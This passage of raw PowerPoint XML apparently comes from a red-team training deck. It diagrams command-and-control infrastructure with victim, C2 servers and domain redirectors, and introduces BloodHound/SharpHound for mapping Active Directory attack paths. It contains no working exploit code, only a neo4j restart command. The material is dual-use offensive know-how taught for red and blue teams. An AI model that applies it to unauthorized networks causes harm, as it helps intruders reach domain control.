          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10070237" y="4340326"/>
            <a:ext cx="1983886" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2AE1CDE-1653-4E16-BBC1-EF98913611BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1582272" y="2609757"/>
            <a:ext cx="872771" cy="1212369"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:headEnd type="none"/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{512542B1-4F87-4D5B-B875-7F95D94A2EE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="22" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5255138" y="2638470"/>
            <a:ext cx="1651118" cy="760290"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Straight Connector 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437CDFCD-726B-4F1C-B6BF-6314912BDF49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="1"/>
            <a:endCxn id="15" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9208496" y="3879423"/>
            <a:ext cx="918036" cy="8889"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Graphic 21" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F08DCE1-A459-4216-A1BA-D56DE22057C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340738" y="2181270"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Graphic 25" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87829FF9-3F85-467E-A41B-4EFD715E162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361656" y="3524977"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Graphic 26" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1238964F-E530-481C-825F-8C9D9684787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489197" y="3390555"/>
            <a:ext cx="1349879" cy="1349879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056AC67E-9E81-4536-8C5A-AB36E411CB3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2627021" y="5905038"/>
            <a:ext cx="1012823" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>C2s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CC1A1F5-A612-4D39-8855-1205363342CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="3"/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="4062359"/>
            <a:ext cx="906096" cy="3136"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:headEnd type="none"/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Connector 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDEF0BB2-E964-46AB-897F-6776D777A931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3834196" y="2540368"/>
            <a:ext cx="506542" cy="98102"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Connector 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65441D37-3790-4A74-ADF8-E89256D5BCEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3821328" y="3982177"/>
            <a:ext cx="540328" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Straight Connector 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA8A0C54-3473-4C43-B0BA-E734B2F5A70C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="2"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5276056" y="3879423"/>
            <a:ext cx="1345863" cy="102754"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1408A326-8147-43E5-A18E-46B921D096C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3982540" y="5616610"/>
            <a:ext cx="2800095" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Domain Redirectors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28293A5C-E834-44DC-9F6F-053CF2BE5F75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9566410" y="1331802"/>
            <a:ext cx="1120244" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D163EFA-FA5F-4EE9-85B4-CDFFF500FD1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9652117" y="1814488"/>
            <a:ext cx="947916" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42" name="Straight Arrow Connector 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA87B89F-C6C4-404B-8FC6-ACF1C90462C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10652931" y="2045321"/>
            <a:ext cx="1257178" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="10160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B1640F2F-08E6-45AF-BCCA-010ED876FA6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10600033" y="1562635"/>
            <a:ext cx="1257178"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716227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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="164172"/>
            <a:ext cx="12192000" cy="770106"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bloodhound|Sharphound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F83E11-AF64-46A8-8A79-5243C87C7991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463826" y="1524000"/>
            <a:ext cx="11390244" cy="4578626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Fantastic tools for both Red and Blue teams!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Quickly identify ‘control relations’ between objects in Active Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Highly complex attack paths visualized in graphs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15843801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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC374D50-0BF8-4461-93B5-768787D41068}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480884" y="934278"/>
            <a:ext cx="9465412" cy="5288331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{586B7C66-F5F4-487B-9FBC-0042D113CF5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="164172"/>
            <a:ext cx="12192000" cy="770106"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bloodhound|Sharphound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207892411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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{586B7C66-F5F4-487B-9FBC-0042D113CF5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="164172"/>
            <a:ext cx="12192000" cy="770106"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bloodhound|Sharphound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FD37623-1B9F-4F58-9324-88605DF8383D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809755" y="1424185"/>
            <a:ext cx="9228767" cy="5221780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usage:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	#service neo4j restart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
